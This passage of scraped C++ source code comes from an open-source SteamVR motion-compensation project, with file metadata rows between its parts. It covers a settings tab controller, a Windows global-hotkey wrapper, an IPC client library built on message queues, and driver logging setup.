(vrmotioncompensation::vrmotioncompensation_exception& e) { switch (e.errorcode) { case (int)vrmotioncompensation::ipc::ReplyStatus::Ok: { m_deviceModeErrorString = "Not an error"; } break; case (int)vrmotioncompensation::ipc::ReplyStatus::InvalidId: { m_deviceModeErrorString = "Invalid Id"; } break; case (int)vrmotioncompensation::ipc::ReplyStatus::NotFound: { m_deviceModeErrorString = "Device not found"; } break; default: { m_deviceModeErrorString = "SteamVR did not load OVRMC .dll"; } break; } LOG(ERROR) << "Exception caught while setting device mode: " << e.what(); return false; } catch (std::exception& e) { m_deviceModeErrorString = "Unknown exception"; LOG(ERROR) << "Unknown exception caught while setting device mode: " << e.what(); return false; } _MotionCompensationIsOn = EnableMotionCompensation; setHMD(MCid); setReferenceTracker(RTid); saveMotionCompensationSettings(); return true; } void DeviceManipulationTabController::resetRefZeroPose() { try { LOG(INFO) << "Resetting reference zero pose"; parent->vrMotionCompensation().resetRefZeroPose(); } catch (vrmotioncompensation::vrmotioncompensation_exception& e) { switch (e.errorcode) { case (int)vrmotioncompensation::ipc::ReplyStatus::Ok: { m_deviceModeErrorString = "Not an error"; } break; default: { m_deviceModeErrorString = "SteamVR did not load OVRMC .dll"; } break; LOG(ERROR) << "Exception caught while setting LPF Beta: " << e.what(); } } catch (std::exception& e) { m_deviceModeErrorString = "Unknown exception"; LOG(ERROR) << "Exception caught while resetting reference zero pose: " << e.what(); } } QString DeviceManipulationTabController::getDeviceModeErrorString() { return m_deviceModeErrorString; } bool DeviceManipulationTabController::isDesktopModeActive() { return parent->isDesktopMode(); } bool DeviceManipulationTabController::setLPFBeta(double value) { // A few checks if the user input is valid if (value <= 0.0) { m_deviceModeErrorString = "Value cannot be lower than 0.0001"; return false; } if (value > 1.0) { m_deviceModeErrorString = "Value cannot be higher than 1.0000"; return false; } _LPFBeta = value; return true; } double DeviceManipulationTabController::getLPFBeta() { return _LPFBeta; } bool DeviceManipulationTabController::setSamples(unsigned value) { // A few checks if the user input is valid if (value < 1) { m_deviceModeErrorString = "Samples cannot be lower than 1"; return false; } _samples = value; return true; } unsigned DeviceManipulationTabController::getSamples() { return _samples; } void DeviceManipulationTabController::setZeroMode(bool setZero) { _setZeroMode = setZero; } bool DeviceManipulationTabController::getZeroMode() { return _setZeroMode; } void DeviceManipulationTabController::increaseLPFBeta(double value) { _LPFBeta += value; if (_LPFBeta > 1.0) { _LPFBeta = 1.0; } else if (_LPFBeta < 0.0) { _LPFBeta = 0.0; } emit settingChanged(); } void DeviceManipulationTabController::increaseSamples(int value) { _samples += value; if (_samples <= 2) { _samples = 2; } emit settingChanged(); } void DeviceManipulationTabController::setHMDtoRefTranslationOffset(unsigned axis, double value) { _offset.Translation.v[axis] = value; parent->vrMotionCompensation().setOffsets(_offset); } void DeviceManipulationTabController::setHMDtoRefRotationOffset(unsigned axis, double value) { _offset.Rotation.v[axis] = value; parent->vrMotionCompensation().setOffsets(_offset); } void DeviceManipulationTabController::increaseRefTranslationOffset(unsigned axis, double value) { _offset.Translation.v[axis] += value; parent->vrMotionCompensation().setOffsets(_offset); emit offsetChanged(); } void DeviceManipulationTabController::increaseRefRotationOffset(unsigned axis, double value) { _offset.Rotation.v[axis] += value; parent->vrMotionCompensation().setOffsets(_offset); emit offsetChanged(); } double DeviceManipulationTabController::getHMDtoRefTranslationOffset(unsigned axis) { return _offset.Translation.v[axis]; } double DeviceManipulationTabController::getHMDtoRefRotationOffset(unsigned axis) { return _offset.Rotation.v[axis]; } void DeviceManipulationTabController::setMotionCompensationMode(unsigned NewMode) { switch (NewMode) { case 0: _motionCompensationMode = vrmotioncompensation::MotionCompensationMode::ReferenceTracker; break; default: break; } } int DeviceManipulationTabController::getMotionCompensationMode() { switch (_motionCompensationMode) { case vrmotioncompensation::MotionCompensationMode::Disabled: return 0; break; case vrmotioncompensation::MotionCompensationMode::ReferenceTracker: return 0; break; default: return 0; break; } } bool DeviceManipulationTabController::setDebugMode(bool TestForStandby) { bool enable = false; QString newButtonText = ""; int newLoggerStatus = 0; // Queue new debug logger state if (TestForStandby && _motionCompensationMode == vrmotioncompensation::MotionCompensationMode::ReferenceTracker && DebugLoggerStatus == 1) { enable = true; newLoggerStatus = 2; newButtonText = "Stop logging"; } else if (TestForStandby) { // return from function if standby mode was not active return true; } else if (!TestForStandby && _motionCompensationMode == vrmotioncompensation::MotionCompensationMode::Disabled && DebugLoggerStatus == 0) { newLoggerStatus = 1; newButtonText = "Standby..."; } else if ((!TestForStandby && _motionCompensationMode == vrmotioncompensation::MotionCompensationMode::Disabled && DebugLoggerStatus == 1) || (!TestForStandby && _motionCompensationMode == vrmotioncompensation::MotionCompensationMode::ReferenceTracker && DebugLoggerStatus == 2)) { enable = false; newLoggerStatus = 0; newButtonText = "Start logging"; } else if (!TestForStandby && _motionCompensationMode == vrmotioncompensation::MotionCompensationMode::ReferenceTracker && DebugLoggerStatus == 0) { enable = true; newLoggerStatus = 2; newButtonText = "Stop logging"; } // Only send new state when logger is not in standby mode if (newLoggerStatus != 1) { try { LOG(INFO) << "Sending debug mode (Status: " << newLoggerStatus << ")"; parent->vrMotionCompensation().startDebugLogger(enable); } catch (vrmotioncompensation::vrmotioncompensation_exception& e) { switch (e.errorcode) { case (int)vrmotioncompensation::ipc::ReplyStatus::Ok: { m_deviceModeErrorString = "Not an error"; } break; case (int)vrmotioncompensation::ipc::ReplyStatus::InvalidId: { m_deviceModeErrorString = "MC must be running to\nstart the debug logger"; } break; default: { m_deviceModeErrorString = "Unknown error"; } break; LOG(ERROR) << "Exception caught while sending debug mode: " << e.what(); return false; } } catch (std::exception& e) { m_deviceModeErrorString = "Unknown exception"; LOG(ERROR) << "Exception caught while sending debug mode: " << e.what(); return false; } } // If send was successful or not needed, apply state DebugLoggerStatus = newLoggerStatus; debugModeButtonString = newButtonText; emit debugModeChanged(); return true; } QString DeviceManipulationTabController::getDebugModeButtonText() { return debugModeButtonString; } } // namespace motioncompensation
25,229
C++
.cpp
788
28.412437
159
0.734176
openvrmc/OpenVR-MotionCompensation
36
16
4
GPL-3.0
9/20/2024, 10:43:45 PM (Europe/Amsterdam)
false
false
false
false
false
false
false
false
1,532,188
qglobalshortcut.cpp
openvrmc_OpenVR-MotionCompensation/client_overlay/src/QGlobalShortcut/qglobalshortcut.cpp
#include "qglobalshortcut.h" #include <QApplication> #include <QStringList> #include <QKeySequence> #include "windows.h" namespace { QString strShortcuts[56] = {"Esc","Tab","BackTab","Backspace","Return","Enter","Ins","Del", "Pause", "Print","SysReq","Clear","Home","End","Left","Up","Right", "Down","PgUp","PgDown","F1","F2","F3","F4","F5","F6","F7","F8","F9","F10","F11","F12", "F13","F14","F15","F16","F17","F18","F19","F20","F21","F22","F23","F24", "Space","*",",","-","/","Media Next","Media Previous","Media Play","Media Stop", "Volume Down","Volume Up","Volume Mute"}; unsigned int codeShortcuts[56] = {VK_ESCAPE,VK_TAB,VK_TAB,VK_BACK,VK_RETURN,VK_RETURN,VK_INSERT,VK_DELETE, VK_PAUSE,VK_PRINT,VK_SNAPSHOT,VK_CLEAR,VK_HOME,VK_END,VK_LEFT,VK_UP,VK_RIGHT, VK_DOWN,VK_PRIOR,VK_NEXT,VK_F1,VK_F2,VK_F3,VK_F4,VK_F5,VK_F6,VK_F7,VK_F8,VK_F9,VK_F10,VK_F11,VK_F12, VK_F13,VK_F14,VK_F15,VK_F16,VK_F17,VK_F18,VK_F19,VK_F20,VK_F21,VK_F22,VK_F23,VK_F24, VK_SPACE,VK_MULTIPLY,VK_SEPARATOR,VK_SUBTRACT,VK_DIVIDE,VK_MEDIA_NEXT_TRACK,VK_MEDIA_PREV_TRACK,VK_MEDIA_PLAY_PAUSE,VK_MEDIA_STOP, VK_VOLUME_DOWN,VK_VOLUME_UP,VK_VOLUME_MUTE}; } class QGlobalData { Q_PROPERTY(unsigned int id READ id WRITE setId) public: QGlobalData() {} QGlobalData(const QGlobalData &other) : m_id(other.m_id) { } unsigned int id(){return m_id;} void setId(unsigned int id){m_id = id;} private: unsigned int m_id; }; class QGlobalShortcutPrivate { public: QKeySequence keys; QList<QGlobalData*>listKeys; QHash <QString, unsigned int>hash; bool enabled; QGlobalShortcutPrivate() { } void initHash() { for(int i = 0; i < 56; i++){ hash.insert(strShortcuts[i],codeShortcuts[i]); } } unsigned int winHotKey(const QKeySequence &sequence) { QStringList list = sequence.toString().split("+"); QString str = list.last(); if(str.length() == 0){ return VK_ADD; } else if(str.length() == 1){ return str.at(0).unicode(); // return Key Letters and Numbers } else { return this->hash.value(str); } return 0; } unsigned int winKeyModificator(const QKeySequence &sequence) { QStringList list = sequence.toString().split("+"); unsigned int keyModificator = 0; foreach (QString str, list) { if(str == "Ctrl"){ keyModificator |= MOD_CONTROL; continue; } else if(str == "Alt"){ keyModificator |= MOD_ALT; continue; } else if(str == "Shift"){ keyModificator |= MOD_SHIFT; continue; } else if(str == "Meta"){ keyModificator |= MOD_WIN; continue; } } return keyModificator; } unsigned int winId(const QKeySequence &keySequence) { return this->winHotKey(keySequence) ^ this->winKeyModificator(keySequence); } }; QGlobalShortcut::QGlobalShortcut(QObject *parent) : QObject(parent), sPrivate(new QGlobalShortcutPrivate) { sPrivate->enabled = true; sPrivate->initHash(); qApp->installNativeEventFilter(this); } QGlobalShortcut::~QGlobalShortcut() { unsetShortcut(); qApp->removeNativeEventFilter(this); delete sPrivate; } bool QGlobalShortcut::nativeEventFilter(const QByteArray &eventType, void *message, long *result) { Q_UNUSED(eventType) Q_UNUSED(result) if(!sPrivate->keys.isEmpty() && sPrivate->enabled){ MSG* msg = reinterpret_cast<MSG*>(message); if(msg->message == WM_HOTKEY){ foreach (QGlobalData *data, sPrivate->listKeys) { if(msg->wParam == data->id()){ emit activated(); return true; } } } } return false; } bool QGlobalShortcut::setShortcut(const QKeySequence &keySequence) { unsetShortcut(); sPrivate->keys = keySequence; QStringList list = sPrivate->keys.toString().split(", "); foreach (QString str, list) { QGlobalData * data = new QGlobalData(); data->setId(sPrivate->winId(QKeySequence(str))); sPrivate->listKeys.append(data); RegisterHotKey(0, data->id(), sPrivate->winKeyModificator(QKeySequence(str)), sPrivate->winHotKey(QKeySequence(str))); } return true; } bool QGlobalShortcut::unsetShortcut() { if(!sPrivate->keys.isEmpty()){ foreach (QGlobalData *data, sPrivate->listKeys) { UnregisterHotKey(0, data->id()); } sPrivate->listKeys.clear(); sPrivate->keys = QKeySequence(""); } return true; } QKeySequence QGlobalShortcut::shortcut() { if(!sPrivate->keys.isEmpty()){ return sPrivate->keys; } else { return QKeySequence(""); } } bool QGlobalShortcut::isEmpty() { return sPrivate->keys.isEmpty(); } void QGlobalShortcut::setEnabled(bool enable) { sPrivate->enabled = enable; } bool QGlobalShortcut::isEnabled() { return sPrivate->enabled; }
5,453
C++
.cpp
163
25.404908
167
0.586705
openvrmc/OpenVR-MotionCompensation
36
16
4
GPL-3.0
9/20/2024, 10:43:45 PM (Europe/Amsterdam)
false
false
false
false
false
true
false
false
1,532,189
vrmotioncompensation.cpp
openvrmc_OpenVR-MotionCompensation/lib_vrmotioncompensation/src/vrmotioncompensation.cpp
#include <vrmotioncompensation.h> #include <boost/date_time/posix_time/posix_time_types.hpp> #include <cstdlib> #include <functional> #include <iostream> #include <config.h> #if VRMOTIONCOMPENSATION_EASYLOGGING == 1 #include "logging.h"; #define WRITELOG(level, txt) LOG(level) << txt; #else #define WRITELOG(level, txt) std::cerr << txt; #endif namespace vrmotioncompensation { // Receives and dispatches ipc messages void VRMotionCompensation::_ipcThreadFunc(VRMotionCompensation* _this) { _this->_ipcThreadRunning = true; while (!_this->_ipcThreadStop) { try { ipc::Reply message; uint64_t recv_size; unsigned priority; boost::posix_time::ptime timeout = boost::posix_time::microsec_clock::universal_time() + boost::posix_time::milliseconds(50); if (_this->_ipcClientQueue->timed_receive(&message, sizeof(ipc::Reply), recv_size, priority, timeout)) { if (recv_size == sizeof(ipc::Reply)) { std::lock_guard<std::recursive_mutex> lock(_this->_mutex); auto i = _this->_ipcPromiseMap.find(message.messageId); if (i != _this->_ipcPromiseMap.end()) { if (i->second.isValid) { i->second.promise.set_value(message); } else { _this->_ipcPromiseMap.erase(i); // nobody wants it, so we delete it } } } } else { std::this_thread::sleep_for(std::chrono::milliseconds(1)); } } catch (std::exception & ex) { WRITELOG(ERROR, "Exception in ipc receive loop: " << ex.what() << std::endl); } } _this->_ipcThreadRunning = false; } VRMotionCompensation::VRMotionCompensation(const std::string& serverQueue, const std::string& clientQueue) : _ipcServerQueueName(serverQueue), _ipcClientQueueName(clientQueue) { } VRMotionCompensation::~VRMotionCompensation() { disconnect(); } bool VRMotionCompensation::isConnected() const { return _ipcServerQueue != nullptr; } void VRMotionCompensation::connect() { if (!_ipcServerQueue) { // Open server-side message queue try { _ipcServerQueue = new boost::interprocess::message_queue(boost::interprocess::open_only, _ipcServerQueueName.c_str()); } catch (std::exception & e) { _ipcServerQueue = nullptr; std::stringstream ss; ss << "Could not open server-side message queue: " << e.what(); throw vrmotioncompensation_connectionerror(ss.str()); } // Append random number to client queue name (and hopefully no other client uses the same random number) _ipcClientQueueName += std::to_string(_ipcRandomDist(_ipcRandomDevice)); // Open client-side message queue try { boost::interprocess::message_queue::remove(_ipcClientQueueName.c_str()); _ipcClientQueue = new boost::interprocess::message_queue( boost::interprocess::create_only, _ipcClientQueueName.c_str(), 100, //max message number sizeof(ipc::Reply) //max message size ); } catch (std::exception & e) { delete _ipcServerQueue; _ipcServerQueue = nullptr; _ipcClientQueue = nullptr; std::stringstream ss; ss << "Could not open client-side message queue: " << e.what(); throw vrmotioncompensation_connectionerror(ss.str()); } // Start ipc thread _ipcThreadStop = false; _ipcThread = std::thread(_ipcThreadFunc, this); // Send ClientConnect message to server ipc::Request message(ipc::RequestType::IPC_ClientConnect); auto messageId = _ipcRandomDist(_ipcRandomDevice); message.msg.ipc_ClientConnect.messageId = messageId; message.msg.ipc_ClientConnect.ipcProcotolVersion = IPC_PROTOCOL_VERSION; strncpy_s(message.msg.ipc_ClientConnect.queueName, _ipcClientQueueName.c_str(), 127); message.msg.ipc_ClientConnect.queueName[127] = '\0'; std::promise<ipc::Reply> respPromise; auto respFuture = respPromise.get_future(); { std::lock_guard<std::recursive_mutex> lock(_mutex); _ipcPromiseMap.insert({ messageId, std::move(respPromise) }); } _ipcServerQueue->send(&message, sizeof(ipc::Request), 0); // Wait for response auto resp = respFuture.get(); m_clientId = resp.msg.ipc_ClientConnect.clientId; { std::lock_guard<std::recursive_mutex> lock(_mutex); _ipcPromiseMap.erase(messageId); } if (resp.status != ipc::ReplyStatus::Ok) { delete _ipcServerQueue; _ipcServerQueue = nullptr; delete _ipcClientQueue; _ipcClientQueue = nullptr; std::stringstream ss; ss << "Connection rejected by server: "; if (resp.status == ipc::ReplyStatus::InvalidVersion) { ss << "Incompatible ipc protocol versions (server: " << resp.msg.ipc_ClientConnect.ipcProcotolVersion << ", client: " << IPC_PROTOCOL_VERSION << ")"; throw vrmotioncompensation_invalidversion(ss.str()); } else if (resp.status != ipc::ReplyStatus::Ok) { ss << "Error code " << (int)resp.status; throw vrmotioncompensation_connectionerror(ss.str()); } } } } void VRMotionCompensation::disconnect() { if (_ipcServerQueue) { // Send disconnect message (so the server can free resources) ipc::Request message(ipc::RequestType::IPC_ClientDisconnect); auto messageId = _ipcRandomDist(_ipcRandomDevice); message.msg.ipc_ClientDisconnect.clientId = m_clientId; message.msg.ipc_ClientDisconnect.messageId = messageId; std::promise<ipc::Reply> respPromise; auto respFuture = respPromise.get_future(); { std::lock_guard<std::recursive_mutex> lock(_mutex); _ipcPromiseMap.insert({ messageId, std::move(respPromise) }); } _ipcServerQueue->send(&message, sizeof(ipc::Request), 0); auto resp = respFuture.get(); m_clientId = resp.msg.ipc_ClientConnect.clientId; { std::lock_guard<std::recursive_mutex> lock(_mutex); _ipcPromiseMap.erase(messageId); } // Stop ipc thread if (_ipcThreadRunning) { _ipcThreadStop = true; _ipcThread.join(); } // delete message queues if (_ipcServerQueue) { delete _ipcServerQueue; _ipcServerQueue = nullptr; } if (_ipcClientQueue) { delete _ipcClientQueue; _ipcClientQueue = nullptr; } } } void VRMotionCompensation::ping(bool modal, bool enableReply) { if (_ipcServerQueue) { uint32_t messageId = _ipcRandomDist(_ipcRandomDevice); uint64_t nonce = _ipcRandomDist(_ipcRandomDevice); ipc::Request message(ipc::RequestType::IPC_Ping); message.msg.ipc_Ping.clientId = m_clientId; message.msg.ipc_Ping.messageId = messageId; message.msg.ipc_Ping.nonce = nonce; if (modal) { std::promise<ipc::Reply> respPromise; auto respFuture = respPromise.get_future(); { std::lock_guard<std::recursive_mutex> lock(_mutex); _ipcPromiseMap.insert({ messageId, std::move(respPromise) }); } _ipcServerQueue->send(&message, sizeof(ipc::Request), 0); auto resp = respFuture.get(); { std::lock_guard<std::recursive_mutex> lock(_mutex); _ipcPromiseMap.erase(messageId); } if (resp.status != ipc::ReplyStatus::Ok) { std::stringstream ss; ss << "Error while pinging server: Error code " << (int)resp.status; throw vrmotioncompensation_exception(ss.str()); } } else { if (enableReply) { std::lock_guard<std::recursive_mutex> lock(_mutex); message.msg.ipc_Ping.messageId = messageId; _ipcPromiseMap.insert({ messageId, _ipcPromiseMapEntry() }); } else { message.msg.ipc_Ping.messageId = 0; } _ipcServerQueue->send(&message, sizeof(ipc::Request), 0); } } else { throw vrmotioncompensation_connectionerror("No active connection."); } } void VRMotionCompensation::getDeviceInfo(uint32_t OpenVRId, DeviceInfo& info) { if (_ipcServerQueue) { //Create message ipc::Request message(ipc::RequestType::DeviceManipulation_GetDeviceInfo); memset(&message.msg, 0, sizeof(message.msg)); message.msg.ovr_GenericDeviceIdMessage.clientId = m_clientId; message.msg.ovr_GenericDeviceIdMessage.OpenVRId = OpenVRId; //Create random message ID uint32_t messageId = _ipcRandomDist(_ipcRandomDevice); message.msg.ovr_GenericDeviceIdMessage.messageId = messageId; //Allocate memory for the reply std::promise<ipc::Reply> respPromise; auto respFuture = respPromise.get_future(); { std::lock_guard<std::recursive_mutex> lock(_mutex); _ipcPromiseMap.insert({ messageId, std::move(respPromise) }); } //Send message _ipcServerQueue->send(&message, sizeof(ipc::Request), 0); auto resp = respFuture.get(); { std::lock_guard<std::recursive_mutex> lock(_mutex); _ipcPromiseMap.erase(messageId); } //If there was an error, notify the user std::stringstream ss; ss << "Error while getting device info: "; if (resp.status == ipc::ReplyStatus::Ok) { info.OpenVRId = resp.msg.dm_deviceInfo.OpenVRId; info.deviceClass = resp.msg.dm_deviceInfo.deviceClass; info.deviceMode = resp.msg.dm_deviceInfo.deviceMode; } else if (resp.status == ipc::ReplyStatus::NotFound) { info.deviceClass = resp.msg.dm_deviceInfo.deviceClass; } else if (resp.status == ipc::ReplyStatus::InvalidId) { ss << "Invalid device id"; throw vrmotioncompensation_invalidid(ss.str()); } /*else if (resp.status == ipc::ReplyStatus::NotFound) { ss << "Device not found"; throw vrmotioncompensation_notfound(ss.str()); }*/ else if (resp.status != ipc::ReplyStatus::Ok) { ss << "Error code " << (int)resp.status; throw vrmotioncompensation_exception(ss.str()); } } else { throw vrmotioncompensation_connectionerror("No active connection."); } } void VRMotionCompensation::setDeviceMotionCompensationMode(uint32_t MCdeviceId, uint32_t RTdeviceId, MotionCompensationMode Mode, bool modal) { if (_ipcServerQueue) { //Create message ipc::Request message(ipc::RequestType::DeviceManipulation_MotionCompensationMode); memset(&message.msg, 0, sizeof(message.msg)); message.msg.dm_MotionCompensationMode.clientId = m_clientId; message.msg.dm_MotionCompensationMode.messageId = 0; message.msg.dm_MotionCompensationMode.MCdeviceId = MCdeviceId; message.msg.dm_MotionCompensationMode.RTdeviceId = RTdeviceId; message.msg.dm_MotionCompensationMode.CompensationMode = Mode; if (modal) { //Create random message ID uint32_t messageId = _ipcRandomDist(_ipcRandomDevice); message.msg.dm_MotionCompensationMode.messageId = messageId; //Allocate memory for the reply std::promise<ipc::Reply> respPromise; auto respFuture = respPromise.get_future(); { std::lock_guard<std::recursive_mutex> lock(_mutex); _ipcPromiseMap.insert({ messageId, std::move(respPromise) }); } //Send message _ipcServerQueue->send(&message, sizeof(ipc::Request), 0); auto resp = respFuture.get(); { std::lock_guard<std::recursive_mutex> lock(_mutex); _ipcPromiseMap.erase(messageId); } //If there was an error, notify the user std::stringstream ss; ss << "Error while setting motion compensation mode: "; if (resp.status == ipc::ReplyStatus::InvalidId) { ss << "Invalid device id"; throw vrmotioncompensation_invalidid(ss.str(), (int)resp.status); } else if (resp.status == ipc::ReplyStatus::NotFound) { ss << "Device not found"; throw vrmotioncompensation_notfound(ss.str(), (int)resp.status); } else if (resp.status != ipc::ReplyStatus::Ok) { ss << "Error code " << (int)resp.status; throw vrmotioncompensation_exception(ss.str(), (int)resp.status); } } else { _ipcServerQueue->send(&message, sizeof(ipc::Request), 0); } } else { throw vrmotioncompensation_connectionerror("No active connection."); } } void VRMotionCompensation::setMoticonCompensationSettings(double LPF_Beta, uint32_t samples, bool setZero) { if (_ipcServerQueue) { //Create message ipc::Request message(ipc::RequestType::DeviceManipulation_SetMotionCompensationProperties); memset(&message.msg, 0, sizeof(message.msg)); message.msg.dm_SetMotionCompensationProperties.clientId = m_clientId; message.msg.dm_SetMotionCompensationProperties.messageId = 0; message.msg.dm_SetMotionCompensationProperties.LPFBeta = LPF_Beta; message.msg.dm_SetMotionCompensationProperties.samples = samples; message.msg.dm_SetMotionCompensationProperties.setZero = setZero; //Create random message ID uint32_t messageId = _ipcRandomDist(_ipcRandomDevice); message.msg.dm_SetMotionCompensationProperties.messageId = messageId; //Allocate memory for the reply std::promise<ipc::Reply> respPromise; auto respFuture = respPromise.get_future(); { std::lock_guard<std::recursive_mutex> lock(_mutex); _ipcPromiseMap.insert({ messageId, std::move(respPromise) }); } //Send message _ipcServerQueue->send(&message, sizeof(ipc::Request), 0); WRITELOG(INFO, "MC message created sending to driver" << std::endl); auto resp = respFuture.get(); { std::lock_guard<std::recursive_mutex> lock(_mutex); _ipcPromiseMap.erase(messageId); } //If there was an error, notify the user std::stringstream ss; ss << "Error while setting motion compensation mode: "; if (resp.status != ipc::ReplyStatus::Ok) { ss << "Error code " << (int)resp.status; throw vrmotioncompensation_exception(ss.str(), (int)resp.status); } } else { throw vrmotioncompensation_connectionerror("No active connection."); } } void VRMotionCompensation::resetRefZeroPose() { if (_ipcServerQueue) { // Create message ipc::Request message(ipc::RequestType::DeviceManipulation_ResetRefZeroPose); memset(&message.msg, 0, sizeof(message.msg)); message.msg.dm_ResetRefZeroPose.clientId = m_clientId; message.msg.dm_ResetRefZeroPose.messageId = 0; // Create random message ID uint32_t messageId = _ipcRandomDist(_ipcRandomDevice); message.msg.dm_ResetRefZeroPose.messageId = messageId; // Allocate memory for the reply std::promise<ipc::Reply> respPromise; auto respFuture = respPromise.get_future(); { std::lock_guard<std::recursive_mutex> lock(_mutex); _ipcPromiseMap.insert({ messageId, std::move(respPromise) }); } // Send message _ipcServerQueue->send(&message, sizeof(ipc::Request), 0); WRITELOG(INFO, "MC message created sending to driver" << std::endl); auto resp = respFuture.get(); { std::lock_guard<std::recursive_mutex> lock(_mutex); _ipcPromiseMap.erase(messageId); } // If there was an error, notify the user std::stringstream ss; ss << "Error while setting motion compensation mode: "; if (resp.status != ipc::ReplyStatus::Ok) { ss << "Error code " << (int)resp.status; throw vrmotioncompensation_exception(ss.str(), (int)resp.status); } } else { throw vrmotioncompensation_connectionerror("No active connection."); } } void VRMotionCompensation::setOffsets(MMFstruct_OVRMC_v1 offsets) { if (_ipcServerQueue) { //Create message ipc::Request message(ipc::RequestType::DeviceManipulation_SetOffsets); memset(&message.msg, 0, sizeof(message.msg)); message.msg.dm_SetOffsets.clientId = m_clientId; message.msg.dm_SetOffsets.messageId = 0; message.msg.dm_SetOffsets.offsets = offsets; //Create random message ID uint32_t messageId = _ipcRandomDist(_ipcRandomDevice); message.msg.dm_SetOffsets.messageId = messageId; //Allocate memory for the reply std::promise<ipc::Reply> respPromise; auto respFuture = respPromise.get_future(); { std::lock_guard<std::recursive_mutex> lock(_mutex); _ipcPromiseMap.insert({ messageId, std::move(respPromise) }); } //Send message _ipcServerQueue->send(&message, sizeof(ipc::Request), 0); auto resp = respFuture.get(); { std::lock_guard<std::recursive_mutex> lock(_mutex); _ipcPromiseMap.erase(messageId); } //If there was an error, notify the user std::stringstream ss; ss << "Error while setting offsets: "; if (resp.status != ipc::ReplyStatus::Ok) { ss << "Error code " << (int)resp.status; throw vrmotioncompensation_exception(ss.str(), (int)resp.status); } } else { throw vrmotioncompensation_connectionerror("No active connection."); } } void VRMotionCompensation::startDebugLogger(bool enable, bool modal) { if (_ipcServerQueue) { //Create message ipc::Request message(ipc::RequestType::DebugLogger_Settings); memset(&message.msg, 0, sizeof(message.msg)); message.msg.dl_Settings.clientId = m_clientId; message.msg.dl_Settings.messageId = 0; message.msg.dl_Settings.enabled = enable; if (modal) { //Create random message ID uint32_t messageId = _ipcRandomDist(_ipcRandomDevice); message.msg.dl_Settings.messageId = messageId; //Allocate memory for the reply std::promise<ipc::Reply> respPromise; auto respFuture = respPromise.get_future(); { std::lock_guard<std::recursive_mutex> lock(_mutex); _ipcPromiseMap.insert({ messageId, std::move(respPromise) }); } //Send message _ipcServerQueue->send(&message, sizeof(ipc::Request), 0); WRITELOG(INFO, "DL message created sending to driver" << std::endl); auto resp = respFuture.get(); { std::lock_guard<std::recursive_mutex> lock(_mutex); _ipcPromiseMap.erase(messageId); } //If there was an error, notify the user std::stringstream ss; ss << "Error while starting debug logger: "; if (resp.status == ipc::ReplyStatus::InvalidId) { ss << "MC must be running"; throw vrmotioncompensation_invalidid(ss.str(), (int)resp.status); } else if (resp.status != ipc::ReplyStatus::Ok) { ss << "Error code " << (int)resp.status; throw vrmotioncompensation_exception(ss.str(), (int)resp.status); } } else { _ipcServerQueue->send(&message, sizeof(ipc::Request), 0); WRITELOG(INFO, "DL message created sending to driver" << std::endl); } } else { throw vrmotioncompensation_connectionerror("No active connection."); } } } // end namespace vrmotioncompensation
18,204
C++
.cpp
545
29.111927
176
0.699517
openvrmc/OpenVR-MotionCompensation
36
16
4
GPL-3.0
9/20/2024, 10:43:45 PM (Europe/Amsterdam)
false
false
false
false
false
false
false
false
1,532,191
dllmain.cpp
openvrmc_OpenVR-MotionCompensation/driver_vrmotioncompensation/src/dllmain.cpp
#include "logging.h" const char* logConfigFileName = "logging.conf"; const char* logConfigDefault = "* GLOBAL:\n" " FORMAT = \"[%level] %datetime{%Y-%M-%d %H:%m:%s}: %msg\"\n" " FILENAME = \"driver_motioncompensation.log\"\n" " ENABLED = true\n" " TO_FILE = true\n" " TO_STANDARD_OUTPUT = true\n" " MAX_LOG_FILE_SIZE = 2097152 ## 2MB\n" "* TRACE:\n" " ENABLED = false\n" "* DEBUG:\n" " ENABLED = false\n"; INITIALIZE_EASYLOGGINGPP void init_logging() { el::Loggers::addFlag(el::LoggingFlag::DisableApplicationAbortOnFatalLog); el::Loggers::addFlag(el::LoggingFlag::StrictLogFileSizeCheck); el::Configurations conf(logConfigFileName); conf.parseFromText(logConfigDefault); //conf.parseFromFile(logConfigFileName); conf.setRemainingToDefault(); el::Loggers::reconfigureAllLoggers(conf); } BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved ) { switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: init_logging(); LOG(INFO) << "|========================================================================================|"; LOG(INFO) << "VRMotionCompensation dll loaded..."; LOG(TRACE) << "Trace messages enabled."; LOG(DEBUG) << "Debug messages enabled."; break; case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE; }
1,337
C++
.cpp
46
27.043478
108
0.674437
openvrmc/OpenVR-MotionCompensation
36
16
4
GPL-3.0
9/20/2024, 10:43:45 PM (Europe/Amsterdam)
false
false
false
false
false
true
false
false
1,532,192
driver_ipc_shm.cpp
openvrmc_OpenVR-MotionCompensation/driver_vrmotioncompensation/src/com/shm/driver_ipc_shm.cpp
#include "driver_ipc_shm.h" #include <boost/date_time/posix_time/posix_time_types.hpp> #include <openvr_driver.h> #include <ipc_protocol.h> #include <openvr_math.h> #include "../../driver/ServerDriver.h" #include "../../devicemanipulation/DeviceManipulationHandle.h" namespace vrmotioncompensation { namespace driver { void IpcShmCommunicator::init(ServerDriver* driver) { _driver = driver; _ipcThreadStopFlag = false; _ipcThread = std::thread(_ipcThreadFunc, this, driver); } void IpcShmCommunicator::shutdown() { if (_ipcThreadRunning) { _ipcThreadStopFlag = true; _ipcThread.join(); } } void IpcShmCommunicator::_ipcThreadFunc(IpcShmCommunicator* _this, ServerDriver* driver) { _this->_ipcThreadRunning = true; LOG(DEBUG) << "CServerDriver::_ipcThreadFunc: thread started"; try { // Create message queue boost::interprocess::message_queue::remove(_this->_ipcQueueName.c_str()); boost::interprocess::message_queue messageQueue( boost::interprocess::create_only, _this->_ipcQueueName.c_str(), 100, //max message number sizeof(ipc::Request) //max message size ); while (!_this->_ipcThreadStopFlag) { try { ipc::Request message; uint64_t recv_size; unsigned priority; boost::posix_time::ptime timeout = boost::posix_time::microsec_clock::universal_time() + boost::posix_time::milliseconds(50); if (messageQueue.timed_receive(&message, sizeof(ipc::Request), recv_size, priority, timeout)) { LOG(TRACE) << "CServerDriver::_ipcThreadFunc: IPC request received ( type " << (int)message.type << ")"; if (recv_size == sizeof(ipc::Request)) { switch (message.type) { case ipc::RequestType::IPC_ClientConnect: { try { auto queue = std::make_shared<boost::interprocess::message_queue>(boost::interprocess::open_only, message.msg.ipc_ClientConnect.queueName); ipc::Reply reply(ipc::ReplyType::IPC_ClientConnect); reply.messageId = message.msg.ipc_ClientConnect.messageId; 